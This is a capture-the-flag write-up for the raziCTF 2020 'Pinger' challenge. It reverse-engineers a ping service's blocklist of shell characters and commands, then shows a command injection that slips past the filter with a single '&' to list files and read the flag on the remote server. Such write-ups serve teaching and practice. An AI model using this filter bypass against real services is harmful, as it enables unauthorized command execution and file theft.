raziCTF 2020 : Pinger
Oct 26, 2020
Challenge Description
Solution
On This Chalange we where given a binary with an ip address and a port to connect into, the server gave us the posibility to send ICMP ECHO_REQUEST to our desired ip adress, sounds like a Remote Command Injection
We started by Reverse Engenering the binary file :
00102063 63 ?? 63h c 00102064 61 ?? 61h a 00102065 74 ?? 74h t 00102066 00 ?? 00h DAT_00102067 XREF[1]: main:0010156d(*) 00102067 65 ?? 65h e 00102068 63 ?? 63h c 00102069 68 ?? 68h h 0010206a 6f ?? 6Fh o 0010206b 00 ?? 00h s_python_0010206c XREF[1]: main:00101589(*) 0010206c 70 79 74 ds "python" 68 6f 6e 00 s_print_00102073 XREF[1]: main:001015a5(*) 00102073 70 72 69 ds "print" 6e 74 00 DAT_00102079 XREF[1]: main:001015c1(*) 00102079 27 ?? 27h ' 0010207a 26 ?? 26h & 0010207b 26 ?? 26h & 0010207c 27 ?? 27h ' DAT_0010207e XREF[1]: main:001015dd(*) 0010207e 3b ?? 3Bh ; DAT_00102080 XREF[1]: main:001015f9(*) 00102080 5c ?? 5Ch \ DAT_00102082 XREF[1]: main:00101615(*) 00102082 29 ?? 29h ) DAT_00102084 XREF[1]: main:00101631(*) 00102084 28 ?? 28h ( DAT_00102086 XREF[1]: main:0010164d(*) 00102086 2a ?? 2Ah * DAT_00102088 XREF[1]: main:00101669(*) 00102088 5e ?? 5Eh ^ DAT_0010208a XREF[1]: main:00101685(*) 0010208a 25 ?? 25h % DAT_0010208c XREF[1]: main:001016a1(*) 0010208c 24 ?? 24h $ DAT_0010208e XREF[1]: main:001016bd(*) 0010208e 23 ?? 23h # DAT_00102090 XREF[1]: main:001016d9(*) 00102090 40 ?? 40h @ DAT_00102092 XREF[1]: main:001016f5(*) 00102092 21 ?? 21h ! DAT_00102094 XREF[1]: main:00101711(*) 00102094 6c ?? 6Ch l 00102095 73 ?? 73h s DAT_00102097 XREF[1]: main:0010172d(*) 00102097 63 ?? 63h c 00102098 75 ?? 75h u 00102099 72 ?? 72h r 0010209a 6c ?? 6Ch l DAT_0010209c XREF[1]: main:00101749(*) 0010209c 67 ?? 67h g 0010209d 65 ?? 65h e 0010209e 74 ?? 74h t s_ping_-c_1_001020a0 XREF[1]: main:00101773(*) 001020a0 70 69 6e ds "ping -c 1 " s_sorry_no_hacking_allowed_001020ab XREF[1]: main:00101876(*) 001020ab 73 6f 72 ds "sorry no hacking allowed"
We can clearly See Disallowed commands & characters like :
&& ;\)(*^%$@!# cat echo python print ls curl get
We Got arround this by using &:
m3dsec@local:~/raziCTF/02_pinger$ nc 130.185.122.155 1212
Welcome to our ping serivce
tell me what to ping
ping 127.0.0.1 & dir
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.048 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.048/0.048/0.048/0.000 ms
flag.txt ping ping2
Rather than cat, we can use less to read the flag :
m3dsec@local:~/raziCTF/02_pinger$ nc 130.185.122.155 1212
Welcome to our ping serivce
tell me what to ping
ping 127.0.0.1 & less flag.txt
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.054 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.054/0.054/0.054/0.000 ms
RaziCTF{!_jus7_w4nt3d_t0_h3lp}